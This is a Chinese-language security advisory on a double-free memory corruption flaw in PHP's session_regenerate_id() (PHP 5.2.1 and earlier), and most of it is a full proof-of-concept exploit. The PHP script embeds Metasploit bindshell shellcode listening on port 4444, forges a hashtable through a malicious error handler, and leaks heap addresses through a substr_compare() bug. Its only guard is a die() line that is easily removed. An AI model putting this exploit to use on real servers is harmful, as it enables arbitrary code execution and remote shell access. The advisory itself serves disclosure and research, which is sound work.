PHP session_regenerate_id函数双重释放内存破坏漏洞

发布日期:2007-03-14
更新日期:2007-03-16

受影响系统:

PHP PHP <= 5.2.1

描述:


BUGTRAQ  ID: 22968

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP的session_regenerate_id()函数实现上存在漏洞,本地攻击者可能利用此漏洞在机器上执行任意指令。

session_regenerate_id()函数用于释放旧的会话标识符,然后立即分配会话标识符生成器所生成的新值。

PHP_FUNCTION(session_regenerate_id)
{
    …
        if (PS(id)) {
            …
            efree(PS(id));
        }

        PS(id) = PS(mod)->s_create_sid(&PS(mod_data), NULL TSRMLS_CC);

        PS(send_cookie) = 1;
        php_session_reset_id(TSRMLS_C);

        RETURN_TRUE;
    }
    RETURN_FALSE;
}

但是这种分配并不是原子操作,可能会被内存限制破坏中断。此外,生成器还可以触发PHP错误,导致中断,具体取决于PHP配置。

PHPAPI char *php_session_create_id(PS_Create_SID_ARGS)
{
    …
    switch (PS(hash_func)) {
    …
    default:
        php_error_docref(NULL TSRMLS_CC, E_ERROR, "Invalid session hash function");
        efree(buf);
        return NULL;
    }
    …
    if (PS(hash_bits_per_character) < 4
            || PS(hash_bits_per_character) > 6) {
        PS(hash_bits_per_character) = 4;

        php_error_docref(NULL TSRMLS_CC, E_WARNING, "The ini setting hash_bits_per_character…");
    }
    …

本地攻击者可以通过注册恶意的用户空间错误处理器来利用这个漏洞。在调用这个处理器时,会将哈希表分配到相同空间中做为之前的会话标识符,然后恶意的错误处理器可以通过调用session_id()函数触发再一次释放之前的会话标识符,并向同一空间中分配包含有伪造哈希表的字符串做为哈希表。当用户错误处理器结束时会破坏覆盖的哈希表并调用攻击者所提供的代码。

<*来源:Stefan Esser (s.esser@ematters.de
  
  链接:http://www.php-security.org/MOPB/MOPB-22-2007.html
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

from:http://mcafeefans.com/article.asp?id=608

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || ‘_|/ _` |/ -_)| ‘ \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //          PHP 5 session_regenerate_id() Double Free Exploit         //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  // linux x86 bindshell on port 4444 from Metasploit
  $shellcode = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
      "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
      "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
      "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
      "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
      "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
      "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";

  // Offsets used for the overwrite (will be overwritten by findOffsets()
  $offset_1 = 0x55555555;
  $offset_2 = 0x08048040;
  
  findOffsets(); // Comment out if you want to just test the crash

  // Convert offsets into strings
  $addr1 = pack("L", $offset_1);
  $addr2 = pack("L", $offset_2);

  define("C0", $addr1[0]);
  define("C1", $addr1[1]);
  define("C2", $addr1[2]);
  define("C3", $addr1[3]);
  
  define("M0", $addr2[0]);
 
 define("M1", $addr2[1]);
  define("M2", $addr2[2]);
  define("M3", $addr2[3]);
  
  function myErrorHandler()
  {
    session_id(str_repeat("A", 100));
    
    $GLOBALS[‘str’] = str_repeat("A", 39);
    
    for ($i=0; $i<7; $i++) {
      $GLOBALS[‘str’][$i*4+0] = M0;
      $GLOBALS[‘str’][$i*4+1] = M1;
      $GLOBALS[‘str’][$i*4+2] = M2;
      $GLOBALS[‘str’][$i*4+3] = M3;
    }
    $GLOBALS[‘str’][8*4+0] = C0;
    $GLOBALS[‘str’][8*4+1] = C1;
    $GLOBALS[‘str’][8*4+2] = C2;
    $GLOBALS[‘str’][8*4+3] = C3;

    return true;
  }
  
  function doit()
  {
    ini_set("session.hash_bits_per_character", 666);
  
    error_reporting(E_ALL);
    set_error_handler("myErrorHandler");
    session_id(str_repeat("A", 39));
    session_start();
    session_regenerate_id();
  }
  
  doit();
  

  // This function uses the substr_compare() vulnerability
  // to get the offsets.
  
  function findOffsets()
  {
    global $offset_1, $offset_2, $shellcode;
    // We need to NOT clear these variables,
    //  otherwise the heap is too segmented
    global $memdump, $d, $arr;
    
    $sizeofHashtable = 39;
    $maxlong = 0x7fffffff;

    // Signature of a big endian Hashtable of size 256 with 1 element
    $search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00";

    $memdump = str_repeat("A", 4096);
    for ($i=0; $i<400; $i++) {
      $d[$i]=array();
    }
    unset($d[350]);
    $x = str_repeat("\x01", $sizeofHashtable);
    unset($d[351]);
    unset($d[352]);
    $arr = array();
    for ($i=0; $i<129; $i++) { $arr[$i] = 1; }
    $arr[$shellcode] = 1;
    for ($i=0; $i<129; $i++) { unset($arr[$i]); }

    // If the libc memcmp leaks the information use it
    // otherwise we only get a case insensitive memdump
    $b = substr_compare(chr(65),chr(0),0,1,false) != 65;

    for ($i=0; $i<4096; $i++) {
      $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
      $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
      if ($y-$Y == 1 || $Y-$y==1){
        $y = chr($y);
        if ($b && strtoupper($y)!=$y) {
          if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
            $y = strtoupper($y);
          }
        }
        $memdump[$i] = $y;
      } else {
          $y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
        $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);
        if ($y-$Y != 1 && $Y-$y!=1){
          $memdump[$i] = chr(1);
        } else {
          $memdump[$i] = chr(0);
        }  
      }
    }
    
    // Search shellcode and hashtable and calculate memory address
    $pos_shellcode = strpos($memdump, $shellcode);
    $pos_hashtable = strpos($memdump, $search);
    $addr = substr($memdump, $pos_hashtable+6*4, 4);
    $addr = unpack("L", $addr);
    
    // Fill in both offsets  
    $offset_1 = $addr[1] + 32;
    $offset_2 = $offset_1 – $pos_shellcode + $pos_hashtable + 8*4;
  }
  
?>

建议:


厂商补丁:

PHP

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.php.net